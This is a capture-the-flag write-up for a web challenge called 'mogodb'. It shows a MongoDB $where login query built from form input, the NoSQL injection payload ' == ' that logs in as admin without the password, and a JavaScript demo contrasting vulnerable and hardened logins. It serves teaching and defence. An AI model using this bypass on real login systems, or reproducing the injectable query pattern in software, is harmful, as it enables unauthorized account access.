Mogodb
Description
web/mogodb (by hmmm) | 355 points
The web-scale DB of the future!
Downloads: mogodb.zip
Analysis
We need to log in to the application as the admin user, but we don't have the password.
We need a NoSQL injection (NoSQLi) to log in without it.
user = db.users.find_one(
    {
        "$where":
            f"this.user === '{request.form['user']}' && this.password === '{request.form['password']}'"
    }
)
Solution
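I used ' == ' as the payload to log in as admin.
Essentially, the password part of the query becomes this.password === '' == ''. The strict comparison this.password === '' evaluates to false, and false == '' is true under JavaScript's loose equality, so the condition holds for the admin user whatever the real password is.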
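Why the predicate passes, next to a version that treats the form fields as data, as an added example (not the challenge's code). findOneWhere is a hypothetical stand-in for MongoDB's $where evaluation, the users and passwords are constructed, and loginHardened mirrors what a plain field-equality filter does.

```javascript
// Constructed sample collection; the values are made up for this example.
const users = [
  { user: "admin", password: "s3cr3t-constructed" },
  { user: "guest", password: "guest" },
];

// Stand-in for $where (an assumption of this example): evaluate a JavaScript
// predicate string with `this` bound to each document, return the first match.
function findOneWhere(docs, predicate) {
  const fn = new Function(`return (${predicate});`);
  return docs.find((doc) => fn.call(doc)) ?? null;
}

// Vulnerable: mirrors the f-string in the challenge source. The form fields
// become part of the JavaScript that the database evaluates.
function loginVulnerable(docs, user, password) {
  return findOneWhere(
    docs,
    `this.user === '${user}' && this.password === '${password}'`
  );
}

// Hardened: no code is built from input. Only strings are accepted (which
// also rejects operator objects) and they are compared as plain values.
function loginHardened(docs, user, password) {
  if (typeof user !== "string" || typeof password !== "string") return null;
  return docs.find((d) => d.user === user && d.password === password) ?? null;
}

// The two steps of `this.password === '' == ''`: === and == have the same
// precedence and associate left to right, so === is evaluated first.
function explain(storedPassword) {
  const strict = storedPassword === ""; // false for any non-empty password
  const loose = strict == "";           // false == "" -> 0 == 0 -> true
  return { strict, loose };
}

console.log(loginVulnerable(users, "admin", "wrong"));  // no match
console.log(loginVulnerable(users, "admin", "' == '")); // admin document
console.log(loginHardened(users, "admin", "' == '"));   // no match
console.log(explain(users[0].password));
```

In the Flask handler the equivalent change is to drop $where and pass the two form values as field values in the filter, after checking that both are strings.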
I found This Answer most helpful